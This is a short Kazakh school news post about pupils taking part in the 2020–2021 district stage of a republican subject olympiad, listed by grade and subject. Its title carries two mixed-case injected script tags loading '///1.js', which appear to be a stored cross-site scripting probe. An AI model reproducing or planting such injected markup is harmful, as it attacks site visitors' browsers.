Пән бойынша Республикалық олимпиаданың аудандық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
11.02.2021
2020-2021 оқу жылы жалпы білім беретін пәндер бойынша республикалық олимпиаданың аудандық кезеңі 8 ақпаннан 12 ақпан аралығында өткізіліп жатыр.Ы.Алтынсарин ауылының жалпы орта білім беретінмектебінің дарынды оқушылары бұл шарадан қалыс қалмады. Оқушылар өз білімдерін шыңдай отырып, олимпиадаға зор сеніммен қатысып жатыр. Олимпиаданың алғашқы күні математика пәнінен 8 сынып оқушысы Жұмағали Е, биология пәнінен 11 сынып оқушысы Сыдықова Ж, 8 сынып оқушысы физикадан Қабдығали А, 11 сынып оқушысы физикадан Айғанатова К қатысса, екінші күні географиядан 8 сынып оқушысы Жоламан Д, информатикадан 9 сынып оқушысы Сыдық Ұ., қазақ тілі мен әдебиеттен 10 сынып оқушысы Есенбай Қ, Сыдық Ұ. өз бақтарын сынады. Оқушыларымызға сәттілік тілейміз!!!